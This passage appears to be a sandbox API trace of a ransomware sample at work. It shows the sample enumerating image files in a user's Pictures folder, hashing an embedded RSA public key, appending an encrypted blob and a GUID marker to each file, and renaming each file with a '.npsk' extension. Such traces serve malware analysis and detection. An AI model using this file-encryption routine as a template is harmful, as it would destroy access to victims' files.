KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.386] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.386] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.387] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.387] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.387] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.387] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.387] GetLastError () returned 0x0 [0217.388] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.388] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.388] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.388] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.388] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.388] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.388] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x980, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.389] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.389] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.389] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.389] CloseHandle (hObject=0x61c) returned 1 [0217.391] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\N89nfvgl.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\n89nfvgl.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\N89nfvgl.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\n89nfvgl.gif.npsk")) returned 1 [0217.393] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ee63460, ftCreationTime.dwHighDateTime=0x1d5dbe4, ftLastAccessTime.dwLowDateTime=0x8c501520, ftLastAccessTime.dwHighDateTime=0x1d5dfb9, ftLastWriteTime.dwLowDateTime=0x8c501520, ftLastWriteTime.dwHighDateTime=0x1d5dfb9, nFileSizeHigh=0x0, nFileSizeLow=0x109d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sMCXdOGekTf6OJ4zS.jpg", cAlternateFileName="SMCXDO~1.JPG")) returned 1 [0217.393] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\sMCXdOGekTf6OJ4zS.jpg") returned=".jpg" [0217.394] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\sMCXdOGekTf6OJ4zS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\smcxdogektf6oj4zs.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.394] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=68054) returned 1 [0217.394] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.396] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x109b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.396] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.398] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x109d6, lpOverlapped=0x0) returned 1 [0217.399] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.399] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.399] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.399] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.400] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.400] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.400] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.400] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.400] GetLastError () returned 0x0 [0217.400] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.400] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.400] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.400] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.400] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.401] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.401] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x109d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.401] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.402] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.402] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.402] CloseHandle (hObject=0x61c) returned 1 [0217.404] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\sMCXdOGekTf6OJ4zS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\smcxdogektf6oj4zs.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\sMCXdOGekTf6OJ4zS.jpg.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\smcxdogektf6oj4zs.jpg.npsk")) returned 1 [0217.406] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x864f02d0, ftCreationTime.dwHighDateTime=0x1d5dfb4, ftLastAccessTime.dwLowDateTime=0xff25aba0, ftLastAccessTime.dwHighDateTime=0x1d5da2d, ftLastWriteTime.dwLowDateTime=0xff25aba0, ftLastWriteTime.dwHighDateTime=0x1d5da2d, nFileSizeHigh=0x0, nFileSizeLow=0x2bd9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xleJAna.bmp", cAlternateFileName="")) returned 1 [0217.406] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\xleJAna.bmp") returned=".bmp" [0217.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\xleJAna.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\xlejana.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.407] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=11225) returned 1 [0217.407] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.409] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2bb3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.409] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.410] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.410] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x2bd9, lpOverlapped=0x0) returned 1 [0217.411] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.411] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.411] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.411] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.412] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.412] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.412] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.412] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.412] GetLastError () returned 0x0 [0217.412] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.413] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.413] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.413] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.413] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.413] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.413] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2bd9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.413] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.414] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.414] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.414] CloseHandle (hObject=0x61c) returned 1 [0217.416] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\xleJAna.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\xlejana.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\xleJAna.bmp.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\xlejana.bmp.npsk")) returned 1 [0217.418] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69a7f000, ftCreationTime.dwHighDateTime=0x1d5d84e, ftLastAccessTime.dwLowDateTime=0xbf920e40, ftLastAccessTime.dwHighDateTime=0x1d5e4a3, ftLastWriteTime.dwLowDateTime=0xbf920e40, ftLastWriteTime.dwHighDateTime=0x1d5e4a3, nFileSizeHigh=0x0, nFileSizeLow=0x181b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xSnul.bmp", cAlternateFileName="")) returned 1 [0217.418] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\xSnul.bmp") returned=".bmp" [0217.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l20mH\\xSnul.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l20mh\\xsnul.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.419] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=98743) returned 1 [0217.419] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.421] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x18191, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.421] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.423] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x181b7, lpOverlapped=0x0) returned 1 [0217.424] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.424] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.424] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.424] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.425] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.425] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.425] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.425] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.425] GetLastError () returned 0x0 [0217.425] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.425] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.426] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.426] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.426] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.426] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.427] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x181b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.427] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.427] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.427] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.427] CloseHandle (hObject=0x61c) returned 1 [0217.439] MoveFileW 